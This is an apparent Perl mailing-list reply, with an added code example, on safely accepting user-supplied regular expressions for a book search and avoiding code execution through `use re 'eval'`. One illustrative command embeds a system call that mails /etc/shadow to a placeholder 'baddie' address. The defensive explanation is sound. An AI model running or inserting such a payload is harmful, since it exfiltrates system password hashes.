On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
>
> But you don't want to let them execute any code.
>
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?
In general this shouldn't be a problem provided you don't turn on use re "eval";

  $ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
  Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print "hello" })/ at -e line 1.

  $ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
  hello

Of course, you're not going to be too worried about people saying hello, but once you can execute arbitrary code all bets are off:

  $ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" })'

Make sure you don't do the whole match as part of a string eval, and since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the characters you allow in the user input, but this doesn't provide maximum flexibility.

-- 
Paul Johnson - p...@pjcj.net
http://www.pjcj.net
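The approach described in the reply, as an added example that is not part of the original thread: the user's pattern is interpolated as a plain string into qr// with no `use re 'eval'` in scope, inside an eval block so that an invalid pattern (or one carrying a code block, which perl refuses to compile at runtime) is reported as an error instead of executed. The book records and the helper names are constructed for the demo.

```perl
#!/usr/bin/env perl
# Added example (not from the original post): compile a user-supplied
# pattern as a plain string, without `use re 'eval'`, so that embedded
# (?{ ... }) / (??{ ... }) blocks are rejected rather than run.
use strict;
use warnings;

# Constructed sample "books" (title, author, content) for the demo.
my @books = (
    { title => 'Programming Perl', author => 'Larry Wall',      content => 'camel' },
    { title => 'Learning Perl',    author => 'Randal Schwartz', content => 'llama' },
);

# Compile the user string into a qr// object. Returns ($re, undef) on
# success or (undef, $error) when perl refuses the pattern, e.g.
# "Eval-group not allowed at runtime, use re 'eval' in regex ...".
# Note: a string is interpolated once, so nothing inside it is re-evaluated.
sub compile_user_pattern {
    my ($pattern) = @_;
    my $re = eval { qr/$pattern/ };
    return (undef, $@) unless defined $re;
    return ($re, undef);
}

# Search one field (title, author or content) of every book with a
# compiled pattern; only a qr// object ever reaches the match operator.
sub search_books {
    my ($re, $field) = @_;
    return grep { $_->{$field} =~ $re } @books;
}

# Usage: an ordinary pattern is accepted and matched ...
my ($ok, $ok_err) = compile_user_pattern('^Learn\w+');
die "unexpected: $ok_err" unless defined $ok;
print "matched: $_->{title}\n" for search_books($ok, 'title');

# ... while a pattern carrying a code block never gets compiled or run.
my ($bad, $bad_err) = compile_user_pattern('(?{ 1 })');
print "rejected: $bad_err" unless defined $bad;
```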